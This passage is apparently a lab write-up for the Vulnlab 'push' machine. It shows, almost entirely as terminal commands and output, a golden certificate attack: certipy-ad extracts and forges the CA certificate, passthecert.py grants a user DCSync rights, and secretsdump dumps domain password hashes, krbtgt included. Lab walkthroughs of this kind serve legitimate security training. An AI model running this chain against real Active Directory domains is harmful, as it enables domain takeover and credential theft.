golden Cerificate attack with certipy-ad & passthecert possible because we have system access to ms01 ( which is the CA )

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad ca -u sccadmin -p '7u<redacted>JM' -target-ip MS01.push.vl -backup
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Creating new service
[*] Creating backup
[*] Retrieving backup
[*] Got certificate and private key
[*] Saved certificate and private key to 'CA.pfx'
[*] Cleaning up
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad forge -ca-pfx CA.pfx -upn administrator@push.vl -subject 'CN=Administrator,CN=Users,DC=PUSH,DC=VL'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved forged certificate and private key to 'administrator_forged.pfx'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nokey -out administrator.crt
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing certificate and  to 'administrator.crt'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nocert -out administrator.key
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing private key to 'administrator.key'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ python3 passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target kelly.hill -elevate -domain push.vl -dc-host dc01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Granted user 'kelly.hill' DCSYNC rights!
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-secretsdump kelly.hill@DC01.push.vl 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0d<redacted>0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9fd5a3d1406ca03668fcd04a0b4eb09:::
push.vl\svcsql:1104:aad3b435b51404eeaad3b435b51404ee:19<redacted>85:::

That was fun 🙂

.

references used

sccm

PassTheCert

sharpcollection

 

.